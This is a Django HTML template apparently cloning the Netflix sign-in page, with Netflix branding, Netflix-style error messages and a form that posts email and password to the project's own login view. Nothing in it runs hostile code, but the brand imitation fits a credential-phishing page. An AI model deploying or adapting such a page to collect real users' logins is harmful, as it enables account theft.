<!DOCTYPE html>
<html lang="en">
    <head>
        {% load static %}
        <meta charset="utf-8">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
        <link rel="stylesheet" type="text/css" href="{% static 'css/style.css' %}">
        <link rel="stylesheet" type="text/css" href="{% static 'css/intlTelInput.css' %}">
        <title>Netflix Login Template | Login Page CSS</title>
    </head>
    <body>
        <div class="upper">
            <div class="logo">
                <a href="#">
                    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Netflix-new-icon.png/180px-Netflix-new-icon.png" class="img-logo">
                </a>
            </div>
            <div class="login-div">
                <form id="login_form" class="login" onsubmit="return Check()" action="{% url 'Login' %}" method="post">
                    {% csrf_token %}
                    <h1>Sign In</h1>
                    {% if failed %}
                        <div data-uia="text" class="error-message">
                        {% if number %}
                            Sorry, we can't find an account with this number. Please make sure to select the correct country code or <b>sign in with email</b>.
                        {% elif password %}
                            Incorrect password. Please try again.
                        {% else %}
                            Sorry, we can't find an account with this email address. Please try again.
                        {% endif %}
                        </div>
                    {% endif %}
                    <div class="input-text">
                        <input id="email_and_phone" type="text"  name="email_and_phone" placeholder="Email or phone number" value="{{ email_and_phone }}">
                        <div class="warning-input" id="warningEmail">Please enter a valid email or phone number. </div>
                    </div>
                    <div class="input-text input-group mb-2">
                        <input class="text-box form-control" type="password" id="password" name="password" placeholder="Password" value="{{ password }}">
                        <button class="toggle_button btn btn-outline-secondary" id="toggle_button" type="button" onclick="Toggle()">SHOW</button>
                        <div class="warning-input" id="warningPassword">Your password must contain between 4 and 60 characters. </div>
                    </div>
                    <div>
                        <button type="submit" class="signin-button">Sign In</button>
                    </div>
                    <div class="remember-flex">
                    </div>
                    <div class="login-face">
                        <a href="{% url 'social:begin' 'facebook' %}" class="color_link log_face">
                            <img class="icon-facebook" src="https://assets.nflxext.com/ffe/siteui/login/images/FB-f-Logo__blue_57.png" height="20">
                            Login with Facebook
                        </a>
                    </div>
                </form>
            </div>
        </div>
        <div class="bottom">
            <div class="bottom-width">
                 <a href="tel:1-844-542-4813" class="tel-link"></a>
                <div>
                    <ul class="bottom-flex">
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"> </a>
                        </li>
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"></a>
                        </li>
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"></a>
                        </li>
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"> </a>
                        </li>
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"></a>
                        </li>
                        <li class="list-bottom">
                            <a href="#" class="link-bottom"></a>
                        </li>
                    </ul>
                </div>
                <div>
                    <p class="fa select-language">
                    </p>
                </div>
            </div>
        </div>
    <script src="{% static 'js/intlTelInput.min.js' %}"></script>
    <script src="{% static 'js/script.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
    </body>
</html>
